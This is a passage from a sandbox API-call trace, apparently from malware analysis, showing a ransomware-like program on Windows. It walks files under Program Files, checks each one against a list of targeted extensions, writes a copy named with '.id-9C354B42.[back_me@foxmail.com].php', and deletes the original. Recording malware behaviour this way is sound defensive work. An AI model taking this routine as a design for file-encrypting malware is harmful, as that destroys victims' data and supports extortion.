(lpString1=".bz2", lpString2=".PNG") returned -1 [0048.866] lstrlenW (lpString=".7z") returned 3 [0048.866] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.866] lstrlenW (lpString=".dbf") returned 4 [0048.866] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.866] lstrlenW (lpString=".1cd") returned 4 [0048.866] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.866] lstrlenW (lpString=".jpg") returned 4 [0048.866] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.866] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.866] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.214] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=18380) returned 1 [0049.214] CloseHandle (hObject=0x1c0) returned 1 [0049.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 0x20 [0049.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.221] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.221] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.230] GetLastError () returned 0x0 [0049.230] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x47cc, lpOverlapped=0x0) returned 1 [0049.242] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x47d0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x47d0, lpOverlapped=0x0) returned 1 [0049.243] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.243] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0049.243] SetEndOfFile (hFile=0x198) returned 1 [0049.243] CloseHandle (hObject=0x198) returned 1 [0049.244] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.244] SetEndOfFile (hFile=0x1c0) returned 1 [0049.244] CloseHandle (hObject=0x1c0) returned 1 [0049.245] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.245] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 1 [0049.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.245] lstrlenW (lpString=".doc") returned 4 [0049.245] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.245] lstrlenW (lpString=".docx") returned 5 [0049.245] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.245] lstrlenW (lpString=".pdf") returned 4 [0049.245] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.245] lstrlenW (lpString=".xls") returned 4 [0049.245] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.245] lstrlenW (lpString=".xlsx") returned 5 [0049.245] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.245] lstrlenW (lpString=".ppt") returned 4 [0049.245] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.245] lstrlenW (lpString=".zip") returned 4 [0049.245] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.245] lstrlenW (lpString=".rar") returned 4 [0049.245] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.245] lstrlenW (lpString=".bz2") returned 4 [0049.245] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.245] lstrlenW (lpString=".7z") returned 3 [0049.246] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.246] lstrlenW (lpString=".dbf") returned 4 [0049.246] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.246] lstrlenW (lpString=".1cd") returned 4 [0049.246] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.246] lstrlenW (lpString=".jpg") returned 4 [0049.246] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.246] lstrlenW (lpString=".doc") returned 4 [0049.246] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0049.246] lstrlenW (lpString=".docx") returned 5 [0049.246] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0049.246] lstrlenW (lpString=".pdf") returned 4 [0049.246] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0049.246] lstrlenW (lpString=".xls") returned 4 [0049.246] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0049.246] lstrlenW (lpString=".xlsx") returned 5 [0049.246] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0049.246] lstrlenW (lpString=".ppt") returned 4 [0049.246] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0049.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.246] lstrlenW (lpString=".zip") returned 4 [0049.246] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0049.246] lstrlenW (lpString=".rar") returned 4 [0049.246] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0049.246] lstrlenW (lpString=".bz2") returned 4 [0049.246] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0049.246] lstrlenW (lpString=".7z") returned 3 [0049.246] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0049.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.247] lstrlenW (lpString=".dbf") returned 4 [0049.247] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0049.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.247] lstrlenW (lpString=".1cd") returned 4 [0049.247] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0049.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0049.247] lstrlenW (lpString=".jpg") returned 4 [0049.247] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0049.247] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0049.247] lstrlenW (lpString="FM20.CHM") returned 8 [0049.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.248] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=334427) returned 1 [0049.248] CloseHandle (hObject=0x1c0) returned 1 [0049.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 0x20 [0049.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.248] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.248] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.249] GetLastError () returned 0x0 [0049.249] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x51a5b, lpOverlapped=0x0) returned 1 [0049.257] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x51a60, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x51a60, lpOverlapped=0x0) returned 1 [0049.263] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.263] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0049.263] SetEndOfFile (hFile=0x198) returned 1 [0049.264] CloseHandle (hObject=0x198) returned 1 [0049.264] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.264] SetEndOfFile (hFile=0x1c0) returned 1 [0049.267] CloseHandle (hObject=0x1c0) returned 1 [0049.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.267] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\fm20.chm")) returned 1 [0049.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.268] lstrlenW (lpString=".doc") returned 4 [0049.268] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.268] lstrlenW (lpString=".docx") returned 5 [0049.268] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0049.268] lstrlenW (lpString=".pdf") returned 4 [0049.268] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.268] lstrlenW (lpString=".xls") returned 4 [0049.268] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.268] lstrlenW (lpString=".xlsx") returned 5 [0049.268] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0049.268] lstrlenW (lpString=".ppt") returned 4 [0049.268] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.268] lstrlenW (lpString=".zip") returned 4 [0049.268] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.268] lstrlenW (lpString=".rar") returned 4 [0049.268] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.268] lstrlenW (lpString=".bz2") returned 4 [0049.268] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.268] lstrlenW (lpString=".7z") returned 3 [0049.268] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.268] lstrlenW (lpString=".dbf") returned 4 [0049.268] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.268] lstrlenW (lpString=".1cd") returned 4 [0049.268] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.268] lstrlenW (lpString=".jpg") returned 4 [0049.268] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.269] lstrlenW (lpString=".doc") returned 4 [0049.269] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.269] lstrlenW (lpString=".docx") returned 5 [0049.269] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0049.269] lstrlenW (lpString=".pdf") returned 4 [0049.269] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.269] lstrlenW (lpString=".xls") returned 4 [0049.269] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.269] lstrlenW (lpString=".xlsx") returned 5 [0049.269] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0049.269] lstrlenW (lpString=".ppt") returned 4 [0049.269] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.269] lstrlenW (lpString=".zip") returned 4 [0049.269] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.269] lstrlenW (lpString=".rar") returned 4 [0049.269] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.269] lstrlenW (lpString=".bz2") returned 4 [0049.269] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.269] lstrlenW (lpString=".7z") returned 3 [0049.269] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.269] lstrlenW (lpString=".dbf") returned 4 [0049.269] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.269] lstrlenW (lpString=".1cd") returned 4 [0049.269] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.269] lstrlenW (lpString=".jpg") returned 4 [0049.269] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.270] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0049.270] lstrlenW (lpString="VBCN6.CHM") returned 9 [0049.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.270] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=109718) returned 1 [0049.270] CloseHandle (hObject=0x1c0) returned 1 [0049.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 0x20 [0049.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.270] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.270] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.271] GetLastError () returned 0x0 [0049.271] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x1ac96, lpOverlapped=0x0) returned 1 [0049.524] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1aca0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1aca0, lpOverlapped=0x0) returned 1 [0049.526] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.527] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.527] SetEndOfFile (hFile=0x198) returned 1 [0049.527] CloseHandle (hObject=0x198) returned 1 [0049.527] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.527] SetEndOfFile (hFile=0x1c0) returned 1 [0049.528] CloseHandle (hObject=0x1c0) returned 1 [0049.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.529] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm")) returned 1 [0049.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.529] lstrlenW (lpString=".doc") returned 4 [0049.529] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.529] lstrlenW (lpString=".docx") returned 5 [0049.529] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.529] lstrlenW (lpString=".pdf") returned 4 [0049.529] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.529] lstrlenW (lpString=".xls") returned 4 [0049.529] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.529] lstrlenW (lpString=".xlsx") returned 5 [0049.529] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.529] lstrlenW (lpString=".ppt") returned 4 [0049.529] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.529] lstrlenW (lpString=".zip") returned 4 [0049.529] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.529] lstrlenW (lpString=".rar") returned 4 [0049.529] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.529] lstrlenW (lpString=".bz2") returned 4 [0049.529] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.529] lstrlenW (lpString=".7z") returned 3 [0049.529] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.529] lstrlenW (lpString=".dbf") returned 4 [0049.529] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.530] lstrlenW (lpString=".1cd") returned 4 [0049.530] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 70 [0049.530] lstrlenW (lpString=".jpg") returned 4 [0049.530] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.679] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=27935) returned 1 [0049.679] CloseHandle (hObject=0x210) returned 1 [0049.680] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png")) returned 0x20 [0049.680] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.680] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.680] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.680] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 53 [0049.680] lstrlenW (lpString=".doc") returned 4 [0049.680] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0049.680] lstrlenW (lpString=".docx") returned 5 [0049.680] lstrcmpiW (lpString1=".docx", lpString2="r.png") returned -1 [0049.680] lstrlenW (lpString=".pdf") returned 4 [0049.680] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0049.680] lstrlenW (lpString=".xls") returned 4 